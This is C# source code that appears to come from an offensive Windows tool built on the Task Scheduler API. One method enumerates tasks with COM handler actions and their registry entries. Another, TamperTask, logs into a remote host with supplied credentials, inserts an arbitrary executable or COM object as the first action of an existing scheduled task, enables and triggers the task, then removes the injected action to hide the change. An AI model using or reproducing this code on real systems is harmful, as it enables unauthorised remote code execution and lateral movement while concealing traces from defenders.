private string GetCommandText(Action action) { ExecAction execAction = action as ExecAction; ShowMessageAction showMessageAction = action as ShowMessageAction; ComHandlerAction comHandlerAction = action as ComHandlerAction; EmailAction emailAction = action as EmailAction; if (execAction != null) { return($"{execAction.Path} {execAction.Arguments}"); } else if (showMessageAction != null) { return($"Show message: '{showMessageAction.Title}'"); } else if (comHandlerAction != null) { return($"COM handler: '{comHandlerAction.ClassName}'"); } else if (emailAction != null) { return($"Send email: '{emailAction.Subject}'"); } else { return("unknown action."); } }
static void FindTaskWithComAction(System.IO.TextWriter output, TaskFolder tf) { foreach (Task t in tf.Tasks) { foreach (Microsoft.Win32.TaskScheduler.Action ac in t.Definition.Actions) { ComHandlerAction a = ac as ComHandlerAction; if (a == null) { continue; } string name = null, model = null, path = null, asm = null; try { Microsoft.Win32.RegistryKey k = Microsoft.Win32.Registry.ClassesRoot.OpenSubKey("CLSID\\" + a.ClassId.ToString("B")); if (k == null) { k = Microsoft.Win32.Registry.ClassesRoot.OpenSubKey("Wow6432Node\\CLSID\\" + a.ClassId.ToString("B")); } name = k.GetValue(null, "").ToString(); Microsoft.Win32.RegistryKey sk = k.OpenSubKey("InprocServer32"); path = sk.GetValue(null, "").ToString(); if (!string.IsNullOrEmpty(path)) { try { System.Reflection.AssemblyName.GetAssemblyName(path); asm = "Yes"; } catch { asm = "No"; } } model = sk.GetValue("ThreadingModel", "").ToString(); } catch { } output.WriteLine("{0}\t{1}\t{2}\t{3}\t{4}\t{5}\t{6}\t{7}", t.Path, t.Name, a.ClassId, a.Data, name, path, model, asm); } } foreach (var f in tf.SubFolders) { FindTaskWithComAction(output, f); } }
private static void TamperTask(string task, string binary, string arguments, bool run, string host, string username, string password, string domain) { TaskService ts = AuthenticateToRemoteHost(host, username, password, domain); if (ts != null) { Task t = ts.GetTask(task); if (t == null) { Console.WriteLine("[+] Task not found!"); return; } if (binary.Split('-').Length == 5) // weak parsing, I know but YOLO { // we suppose we want to execute a COM object and not a binary ComHandlerAction action = new ComHandlerAction(new Guid(binary), string.Empty); // add to the top of the list, otherwise it will not execute Console.WriteLine("[+] Adding custom action to task.. "); t.Definition.Actions.Insert(0, action); // enable the task in case it's disabled Console.WriteLine("[+] Enabling the task"); t.Definition.Settings.Enabled = true; t.RegisterChanges(); GetTaskInfo(task, host, username, password, domain); Console.WriteLine("\r\n"); // run it if (run) { Console.WriteLine("[+] Triggering execution"); t.Run(); } Console.WriteLine("[+] Cleaning up"); // remove the new action t.Definition.Actions.Remove(action); t.RegisterChanges(); } else { ExecAction action = new ExecAction(binary, arguments, null); // add to the top of the list, otherwise it will not execute Console.WriteLine("[+] Adding custom action to task.. "); t.Definition.Actions.Insert(0, action); // enable the task in case it's disabled Console.WriteLine("[+] Enabling the task"); t.Definition.Settings.Enabled = true; t.RegisterChanges(); GetTaskInfo(task, host, username, password, domain); Console.WriteLine("\r\n"); // run it if (run) { Console.WriteLine("[+] Triggering execution"); t.Run(); } Console.WriteLine("[+] Cleaning up"); // remove the new action t.Definition.Actions.Remove(action); t.RegisterChanges(); } } }